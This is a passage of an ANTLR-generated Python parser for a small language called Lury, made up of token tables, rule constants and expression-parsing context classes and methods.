"'nil'", "'('", "')'", "'{'", "'}'", "':'" ]
symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "NEWLINE", "NAME", "STRING_LITERAL",
"DECIMAL_INTEGER", "OCT_INTEGER", "HEX_INTEGER", "BIN_INTEGER",
"FLOAT_NUMBER", "ID_FLAG", "SKIP_", "UNKNOWN_CHAR" ]
RULE_program = 0
RULE_statement = 1
RULE_simple_statement = 2
RULE_small_statement = 3
RULE_expression_statement = 4
RULE_expression = 5
RULE_assignment_expression = 6
RULE_comma_expression = 7
RULE_bool_not_expression = 8
RULE_comparison_expression = 9
RULE_range_expression = 10
RULE_in_expression = 11
RULE_or_expression = 12
RULE_xor_expression = 13
RULE_and_expression = 14
RULE_shift_expression = 15
RULE_addition_expression = 16
RULE_multiplication_expression = 17
RULE_power_expression = 18
RULE_unary_expression = 19
RULE_postfix_expression = 20
RULE_key_index = 21
RULE_primary = 22
RULE_literal = 23
RULE_list_literal = 24
RULE_list_element = 25
RULE_hash_literal = 26
RULE_hash_element = 27
ruleNames = [ "program", "statement", "simple_statement", "small_statement",
"expression_statement", "expression", "assignment_expression",
"comma_expression", "bool_not_expression", "comparison_expression",
"range_expression", "in_expression", "or_expression",
"xor_expression", "and_expression", "shift_expression",
"addition_expression", "multiplication_expression", "power_expression",
"unary_expression", "postfix_expression", "key_index",
"primary", "literal", "list_literal", "list_element",
"hash_literal", "hash_element" ]
EOF = Token.EOF
T__0=1
T__1=2
T__2=3
T__3=4
T__4=5
T__5=6
T__6=7
T__7=8
T__8=9
T__9=10
T__10=11
T__11=12
T__12=13
T__13=14
T__14=15
T__15=16
T__16=17
T__17=18
T__18=19
T__19=20
T__20=21
T__21=22
T__22=23
T__23=24
T__24=25
T__25=26
T__26=27
T__27=28
T__28=29
T__29=30
T__30=31
T__31=32
T__32=33
T__33=34
T__34=35
T__35=36
T__36=37
T__37=38
T__38=39
T__39=40
T__40=41
T__41=42
T__42=43
T__43=44
T__44=45
T__45=46
T__46=47
T__47=48
T__48=49
T__49=50
T__50=51
T__51=52
NEWLINE=53
NAME=54
STRING_LITERAL=55
DECIMAL_INTEGER=56
OCT_INTEGER=57
HEX_INTEGER=58
BIN_INTEGER=59
FLOAT_NUMBER=60
ID_FLAG=61
SKIP_=62
UNKNOWN_CHAR=63
def __init__(self, input:TokenStream, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.7.1")
self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
self._predicates = None
class ProgramContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def EOF(self):
return self.getToken(LuryParser.EOF, 0)
def NEWLINE(self, i:int=None):
if i is None:
return self.getTokens(LuryParser.NEWLINE)
else:
return self.getToken(LuryParser.NEWLINE, i)
def statement(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(LuryParser.StatementContext)
else:
return self.getTypedRuleContext(LuryParser.StatementContext,i)
def getRuleIndex(self):
return LuryParser.RULE_program
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterProgram" ):
listener.enterProgram(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitProgram" ):
listener.exitProgram(self)
def program(self):
localctx = LuryParser.ProgramContext(self, self._ctx, self.state)
self.enterRule(localctx, 0, self.RULE_program)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 60
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.T__16) | (1 << LuryParser.T__32) | (1 << LuryParser.T__33) | (1 << LuryParser.T__34) | (1 << LuryParser.T__40) | (1 << LuryParser.T__41) | (1 << LuryParser.T__42) | (1 << LuryParser.T__44) | (1 << LuryParser.T__45) | (1 << LuryParser.T__46) | (1 << LuryParser.T__47) | (1 << LuryParser.T__49) | (1 << LuryParser.NEWLINE) | (1 << LuryParser.NAME) | (1 << LuryParser.STRING_LITERAL) | (1 << LuryParser.DECIMAL_INTEGER) | (1 << LuryParser.OCT_INTEGER) | (1 << LuryParser.HEX_INTEGER) | (1 << LuryParser.BIN_INTEGER) | (1 << LuryParser.FLOAT_NUMBER))) != 0):
self.state = 58
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [LuryParser.NEWLINE]:
self.state = 56
self.match(LuryParser.NEWLINE)
pass
elif token in [LuryParser.T__16, LuryParser.T__32, LuryParser.T__33, LuryParser.T__34, LuryParser.T__40, LuryParser.T__41, LuryParser.T__42, LuryParser.T__44, LuryParser.T__45, LuryParser.T__46, LuryParser.T__47, LuryParser.T__49, LuryParser.NAME, LuryParser.STRING_LITERAL, LuryParser.DECIMAL_INTEGER, LuryParser.OCT_INTEGER, LuryParser.HEX_INTEGER, LuryParser.BIN_INTEGER, LuryParser.FLOAT_NUMBER]:
self.state = 57
self.statement()
pass
else:
raise NoViableAltException(self)
self.state = 62
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 63
self.match(LuryParser.EOF)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class StatementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def simple_statement(self):
return self.getTypedRuleContext(LuryParser.Simple_statementContext,0)
def getRuleIndex(self):
return LuryParser.RULE_statement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStatement" ):
listener.enterStatement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStatement" ):
listener.exitStatement(self)
def statement(self):
localctx = LuryParser.StatementContext(self, self._ctx, self.state)
self.enterRule(localctx, 2, self.RULE_statement)
try:
self.enterOuterAlt(localctx, 1)
self.state = 65
self.simple_statement()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Simple_statementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def small_statement(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(LuryParser.Small_statementContext)
else:
return self.getTypedRuleContext(LuryParser.Small_statementContext,i)
def NEWLINE(self):
return self.getToken(LuryParser.NEWLINE, 0)
def getRuleIndex(self):
return LuryParser.RULE_simple_statement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSimple_statement" ):
listener.enterSimple_statement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSimple_statement" ):
listener.exitSimple_statement(self)
def simple_statement(self):
localctx = LuryParser.Simple_statementContext(self, self._ctx, self.state)
self.enterRule(localctx, 4, self.RULE_simple_statement)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 67
self.small_statement()
self.state = 72
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,2,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
self.state = 68
self.match(LuryParser.T__0)
self.state = 69
self.small_statement()
self.state = 74
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,2,self._ctx)
self.state = 76
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==LuryParser.T__0:
self.state = 75
self.match(LuryParser.T__0)
self.state = 78
self.match(LuryParser.NEWLINE)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Small_statementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def expression_statement(self):
return self.getTypedRuleContext(LuryParser.Expression_statementContext,0)
def getRuleIndex(self):
return LuryParser.RULE_small_statement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSmall_statement" ):
listener.enterSmall_statement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSmall_statement" ):
listener.exitSmall_statement(self)
def small_statement(self):
localctx = LuryParser.Small_statementContext(self, self._ctx, self.state)
self.enterRule(localctx, 6, self.RULE_small_statement)
try:
self.enterOuterAlt(localctx, 1)
self.state = 80
self.expression_statement()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expression_statementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def expression(self):
return self.getTypedRuleContext(LuryParser.ExpressionContext,0)
def getRuleIndex(self):
return LuryParser.RULE_expression_statement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpression_statement" ):
listener.enterExpression_statement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpression_statement" ):
listener.exitExpression_statement(self)
def expression_statement(self):
localctx = LuryParser.Expression_statementContext(self, self._ctx, self.state)
self.enterRule(localctx, 8, self.RULE_expression_statement)
try:
self.enterOuterAlt(localctx, 1)
self.state = 82
self.expression()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ExpressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class AssignExpContext(ExpressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.ExpressionContext
super().__init__(parser)
self.copyFrom(ctx)
def assignment_expression(self):
return self.getTypedRuleContext(LuryParser.Assignment_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAssignExp" ):
listener.enterAssignExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAssignExp" ):
listener.exitAssignExp(self)
def expression(self):
localctx = LuryParser.ExpressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 10, self.RULE_expression)
try:
localctx = LuryParser.AssignExpContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 84
self.assignment_expression()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Assignment_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_assignment_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class CommaExpContext(Assignment_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Assignment_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comma_expression(self):
return self.getTypedRuleContext(LuryParser.Comma_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCommaExp" ):
listener.enterCommaExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCommaExp" ):
listener.exitCommaExp(self)
class AssignContext(Assignment_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Assignment_expressionContext
super().__init__(parser)
self.op = None # Token
self.copyFrom(ctx)
def postfix_expression(self):
return self.getTypedRuleContext(LuryParser.Postfix_expressionContext,0)
def assignment_expression(self):
return self.getTypedRuleContext(LuryParser.Assignment_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAssign" ):
listener.enterAssign(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAssign" ):
listener.exitAssign(self)
def assignment_expression(self):
localctx = LuryParser.Assignment_expressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 12, self.RULE_assignment_expression)
self._la = 0 # Token type
try:
self.state = 91
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,4,self._ctx)
if la_ == 1:
localctx = LuryParser.AssignContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 86
self.postfix_expression(0)
self.state = 87
localctx.op = self._input.LT(1)
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.T__1) | (1 << LuryParser.T__2) | (1 << LuryParser.T__3) | (1 << LuryParser.T__4) | (1 << LuryParser.T__5) | (1 << LuryParser.T__6) | (1 << LuryParser.T__7) | (1 << LuryParser.T__8) | (1 << LuryParser.T__9) | (1 << LuryParser.T__10) | (1 << LuryParser.T__11) | (1 << LuryParser.T__12) | (1 << LuryParser.T__13) | (1 << LuryParser.T__14))) != 0)):
localctx.op = self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 88
self.assignment_expression()
pass
elif la_ == 2:
localctx = LuryParser.CommaExpContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 90
self.comma_expression(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Comma_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_comma_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class CommaContext(Comma_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comma_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comma_expression(self):
return self.getTypedRuleContext(LuryParser.Comma_expressionContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterComma" ):
listener.enterComma(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitComma" ):
listener.exitComma(self)
class BoolNotExpContext(Comma_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comma_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterBoolNotExp" ):
listener.enterBoolNotExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitBoolNotExp" ):
listener.exitBoolNotExp(self)
def comma_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Comma_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 14
self.enterRecursionRule(localctx, 14, self.RULE_comma_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.BoolNotExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 94
self.bool_not_expression()
self._ctx.stop = self._input.LT(-1)
self.state = 101
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = LuryParser.CommaContext(self, LuryParser.Comma_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comma_expression)
self.state = 96
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 97
self.match(LuryParser.T__15)
self.state = 98
self.bool_not_expression()
self.state = 103
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Bool_not_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_bool_not_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class CompExpContext(Bool_not_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Bool_not_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCompExp" ):
listener.enterCompExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCompExp" ):
listener.exitCompExp(self)
class BoolNotContext(Bool_not_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Bool_not_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterBoolNot" ):
listener.enterBoolNot(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitBoolNot" ):
listener.exitBoolNot(self)
def bool_not_expression(self):
localctx = LuryParser.Bool_not_expressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 16, self.RULE_bool_not_expression)
try:
self.state = 107
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [LuryParser.T__16]:
localctx = LuryParser.BoolNotContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 104
self.match(LuryParser.T__16)
self.state = 105
self.bool_not_expression()
pass
elif token in [LuryParser.T__32, LuryParser.T__33, LuryParser.T__34, LuryParser.T__40, LuryParser.T__41, LuryParser.T__42, LuryParser.T__44, LuryParser.T__45, LuryParser.T__46, LuryParser.T__47, LuryParser.T__49, LuryParser.NAME, LuryParser.STRING_LITERAL, LuryParser.DECIMAL_INTEGER, LuryParser.OCT_INTEGER, LuryParser.HEX_INTEGER, LuryParser.BIN_INTEGER, LuryParser.FLOAT_NUMBER]:
localctx = LuryParser.CompExpContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 106
self.comparison_expression(0)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Comparison_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_comparison_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class NotContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNot" ):
listener.enterNot(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNot" ):
listener.exitNot(self)
class EtqContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterEtq" ):
listener.enterEtq(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitEtq" ):
listener.exitEtq(self)
class LtContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLt" ):
listener.enterLt(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLt" ):
listener.exitLt(self)
class LtqContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLtq" ):
listener.enterLtq(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLtq" ):
listener.exitLtq(self)
class RangeExpContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRangeExp" ):
listener.enterRangeExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRangeExp" ):
listener.exitRangeExp(self)
class EqContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterEq" ):
listener.enterEq(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitEq" ):
listener.exitEq(self)
class GtContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGt" ):
listener.enterGt(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGt" ):
listener.exitGt(self)
def comparison_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Comparison_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 18
self.enterRecursionRule(localctx, 18, self.RULE_comparison_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.RangeExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 110
self.range_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 132
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,8,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 130
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,7,self._ctx)
if la_ == 1:
localctx = LuryParser.GtContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 112
if not self.precpred(self._ctx, 7):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 7)")
self.state = 113
self.match(LuryParser.T__17)
self.state = 114
self.range_expression(0)
pass
elif la_ == 2:
localctx = LuryParser.LtContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 115
if not self.precpred(self._ctx, 6):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 6)")
self.state = 116
self.match(LuryParser.T__18)
self.state = 117
self.range_expression(0)
pass
elif la_ == 3:
localctx = LuryParser.EqContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 118
if not self.precpred(self._ctx, 5):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 5)")
self.state = 119
self.match(LuryParser.T__19)
self.state = 120
self.range_expression(0)
pass
elif la_ == 4:
localctx = LuryParser.LtqContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 121
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 122
self.match(LuryParser.T__20)
self.state = 123
self.range_expression(0)
pass
elif la_ == 5:
localctx = LuryParser.EtqContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 124
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 125
self.match(LuryParser.T__21)
self.state = 126
self.range_expression(0)
pass
elif la_ == 6:
localctx = LuryParser.NotContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 127
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 128
self.match(LuryParser.T__22)
self.state = 129
self.range_expression(0)
pass
self.state = 134
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,8,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Range_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_range_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class RangeOpenContext(Range_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Range_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def in_expression(self):
return self.getTypedRuleContext(LuryParser.In_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRangeOpen" ):
listener.enterRangeOpen(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRangeOpen" ):
listener.exitRangeOpen(self)
class RangeCloseContext(Range_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Range_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def in_expression(self):
return self.getTypedRuleContext(LuryParser.In_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRangeClose" ):
listener.enterRangeClose(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRangeClose" ):
listener.exitRangeClose(self)
class InExpContext(Range_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Range_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def in_expression(self):
return self.getTypedRuleContext(LuryParser.In_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInExp" ):
listener.enterInExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInExp" ):
listener.exitInExp(self)
def range_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Range_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 20
self.enterRecursionRule(localctx, 20, self.RULE_range_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.InExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 136
self.in_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 146
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,10,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 144
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,9,self._ctx)
if la_ == 1:
localctx = LuryParser.RangeOpenContext(self, LuryParser.Range_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_range_expression)
self.state = 138
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 139
self.match(LuryParser.T__23)
